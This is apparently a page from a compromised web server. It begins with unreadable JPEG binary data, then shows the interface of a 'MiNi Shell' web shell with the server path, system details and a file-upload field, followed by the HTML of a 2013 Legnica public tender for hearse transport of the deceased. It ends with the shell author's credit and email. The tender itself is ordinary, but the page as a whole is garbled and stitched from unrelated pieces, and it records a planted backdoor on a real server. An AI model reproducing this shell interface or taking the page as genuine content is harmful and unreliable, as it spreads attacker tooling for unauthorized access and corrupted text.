JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130620/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130620/237890-N-2013.html

<p class="kh_header"><b>Legnica: Sukcesywne świadczenie usług w zakresie odbioru i transportu zwłok osób zmarłych na potrzeby LPGK Sp. z o.o. samochodem pogrzebowym (karawanem) Zamawiającego-  TP/TZU/11/2013</b><br>
<b>Numer ogłoszenia: 237890 - 2013; data zamieszczenia: 20.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Legnickie Przedsiębiorstwo Gospodarki Komunalnej Sp. z o.o. , ul. Nowodworska 60, 59-220 Legnica, woj. dolnośląskie, tel. 76 8566350 w. 103, faks 76 7233763.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne świadczenie usług w zakresie odbioru i transportu zwłok osób zmarłych na potrzeby LPGK Sp. z o.o. samochodem pogrzebowym (karawanem) Zamawiającego-  TP/TZU/11/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Sukcesywne świadczenie usług w zakresie odbioru i transportu zwłok osób zmarłych                   na potrzeby LPGK Sp. z o.o. samochodem pogrzebowym (karawanem) Zamawiającego.
Szacunkowa ilość kilometrów do realizacji w okresie obowiązywania umowy: 3.000,00 km
a)	Wykonawca zobowiązany jest do realizacji zadania ze szczególną starannością, obowiązującymi w tym zakresie przepisami, w szczególności do zachowania godności należnej zmarłemu, poszanowania zwłok a także poszanowania rodziny zmarłego.
b)	Wykonawca zobowiązany jest do:
- przenoszenia zwłok z miejsca wydania do pojazdu specjalistycznego( karawanu),
- transportu zwłok oraz wniesienia do pomieszczenia do przechowywania zwłok,
- transportu zwłok oraz wniesienia do krematorium,
- wyjazdu po zwłoki na terenie kraju.
c)	Wykonawca przy wykonywaniu usługi odbioru i transportu zwłok u Zamawiającego zobowiązany jest do zabezpieczenia na czas wykonania usługi minimum dwóch pracowników ( jednorazowo przy wyjeździe) świadczących ww. usługę przez 24 godziny na dobę 7 dni w tygodniu, w tym jedną z uprawnieniami kierowcy ( prawo jazdy kategorii B)
d)	Wykonawca zobowiązany jest do przedłożenia Zamawiającemu wykazu swoich pracowników uprawnionych do odbioru i transportu zwłok na dzień podpisania umowy oraz aktualizacji wykazu w sytuacji zmiany pracownika
e)	Wykonawca dopuści do pracy pracowników:
- posiadających instruktaż stanowiskowy;
- posiadających odpowiednie uprawnienia do obsługi karawanu;
- posiadających badania  lekarski, badania psychologiczne;
- posiadających odpowiedni stan zdrowia oraz zalecane przez lekarzy szczepienia                      do świadczenia usług będących przedmiotem zamówienia;
- wyposażonych w środki indywidualnej ochrony, odzież i obuwie robocze.
f)	Wykonawca zapewni możliwość kontaktu telefonicznego Zamawiającemu w celu przekazania zgłoszeń o potrzebie odbioru zwłok.
g)	Wyjazd powinien nastąpić w czasie nie dłuższym niż 2 godziny od momentu otrzymania zgłoszenia od Zamawiającego.
h)	Wykonawca winien świadczyć usługi, będące przedmiotem zamówienia tylko                                 i wyłącznie na rzecz Zamawiającego. W przypadku gdy Wykonawca będzie świadczył usługi na rzecz innych podmiotów Zamawiający ma prawo do natychmiastowego rozwiązania umowy z winy Wykonawcy oraz naliczyć stosowne kary umowne
i)	Wykonawca przyjmuje na rachunek własny i własne ryzyko samochód (karawan) Zamawiającego wg stanu technicznego wraz z wyposażeniem,
Szczegółowy opis przedmiotu zamówienia stanowi Załącznik nr 1 do SIWZ..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia Wykonawcy zamówień uzupełniających stanowiących nie więcej niż 20 % wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.94.20.00-5, 60.13.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu jest wniesienie wadium. Wysokość wadium wynosi 500,00 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań w tym zakresie.
Ocena spełnienia warunku odbywać się będzie wg załączonych dokumentów:
- Oświadczenie o spełnianiu warunków udziału w postępowaniu  wynikających z art. 22 ust. 1 pkt 1-4 ustawy Pzp wg Załącznika nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o zamówienie musi przedstawić wykaz wykonanych,                           a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych dostaw/usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz, których dostawy / usługi zostały wykonane oraz załączeniem dowodów (np. poświadczenia, referencje), czy te dostawy/usługi zostały wykonane lub są wykonywane należycie.
Wykaz musi zawierać co najmniej 1 realizowaną lub zrealizowaną usługę odpowiadającą przedmiotowi zamówienia wykonywaną w sposób ciągły w okresie ca najmniej 3 lat. 
Wykonawca winien załączyć dokumenty potwierdzające, że usługa została wykonana lub jest wykonywana należycie.

Jeżeli zamawiający jest podmiotem, na rzecz którego usługa główna wskazana przez wykonawcę w wykazie została wcześniej wykonana, wykonawca nie ma obowiązku przedstawiania dowodów, że usługa ta została wykonana lub jest wykonywana należycie.
Ocena spełnienia warunku odbywać się będzie wg załączonych dokumentów:
- Oświadczenie wg Załącznika nr 3 do SIWZ
- Wykaz usług głównych wg Załącznika nr 10 do SIWZ
- Dowody (np. referencje, poświadczenia) potwierdzające należyte wykonanie                                lub wykonywanie głównych usług określające, że zadania wyszczególnione w Załączniku                    nr 10 do SIWZ zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań w tym zakresie.
Ocena spełnienia warunku odbywać się będzie wg załączonego dokumentu:
- Oświadczenie o spełnianiu warunków udziału w postępowaniu wynikających z art. 22 ust. 1 pkt 1-4 ustawy Pzp wg Załącznika nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań w tym zakresie.
Ocena spełnienia warunku odbywać się będzie wg załączonego dokumentu:
- Oświadczenie o spełnianiu warunków udziału w postępowaniu wynikających z art. 22 ust. 1 pkt 1-4 ustawy Pzp wg Załącznika nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań w tym zakresie.
Ocena spełnienia warunku odbywać się będzie wg załączonego dokumentu:
- Oświadczenie o spełnianiu warunków udziału w postępowaniu wynikających z art. 22 ust. 1 pkt 1-4 ustawy Pzp wg Załącznika nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	druk FORMULARZ OFERTOWY według Załącznika nr 2 do SIWZ

2.	dokumenty upoważniające osobę (osoby) podpisującą(e) ofertę do reprezentacji wykonawcy (np.: wypis z KRS lub CEIDG) lub PEŁNOMOCNICTWO w przypadku określonym                      w art. 23 ustawy Pzp lub gdy wykonawca jest reprezentowany przez inną osobę w zakresie określonym w pełnomocnictwie. 

3.	szczegółowy opis przedmiotu zamówienia według Załącznika nr 1 do SIWZ. Wykonawca winien sporządzić opis przedmiotu zamówienia ściśle wg wzoru druku załączonego przez zamawiającego.

4.	pisemne zobowiązanie do oddania wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia wg Załącznika nr 11 do SIWZ

5.	wykaz części zamówienia, których wykonanie zostanie powierzone Podwykonawcom według Załącznika nr 9 do SIWZ

6.	wypełniony, zaakceptowany i zaparafowany projekt umowy według Załącznika nr 8 do SIWZ
7.	Dowód wpłaty wadium (dołączony do FORMULARZA OFERTOWEGO- Załącznik nr 2 do SIWZ)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>3.	Zamawiający dopuszcza możliwość dokonania zmian postanowień niniejszej umowy oraz określa warunki takiej zmiany: 
3.1. Zmiana terminu wykonania umowy
a). przypadki losowe (np. kataklizmy, niemożliwe do przewidzenia wydarzenia, itp.), które 	uniemożliwią realizację usług zgodnie z zapisami umowy,
b). przedłużenie terminu wykonania Umowy o czas niezbędny na przeprowadzenie 	kolejnego postępowania o udzielenie zamówienia i wyłonienie Wykonawcy w oparciu o uPzp, 	w przypadku gdy prowadzone postępowanie ulegnie przedłużeniu z przyczyn niezależnych od 	Zamawiającego.
	3.2. Zmiana wartości zamówienia
a). zmiany prawne mające wpływ na wartość zamówienia ( zmiana stawki podatku VAT w okresie realizacji umowy );
b). w przypadku realizacji mniejszej ilości kilometrów od tej zakładanej w umowie - uzależnione od potrzeb bieżących Zamawiającego;
c). w przypadku realizacji większej ilości kilometrów od tej zakładanej w umowie -      uzależnione od potrzeb bieżących Zamawiającego;
	3.3. Inne
	a). zmiany osób reprezentujących, w przypadku zmian organizacyjnych,
	b). zmiany formy prawnej stron umowy,
	c). zmiany adresowe.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lpgk.legnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Legnickie Przedsiębiorstwo Gospodarki Komunalnej Sp. z o.o., ul. Nowodworska 60, 59-220 Legnica, Dział Rozwoju Przygotowania Produkcji pok. 2 (parter)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.06.2013 godzina 09:00, miejsce: Legnickie Przedsiębiorstwo Gospodarki Komunalnej Sp. z o.o. ul. Nowodworska 60, 59-220 Legnica, SEKRETARIAT Ip..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com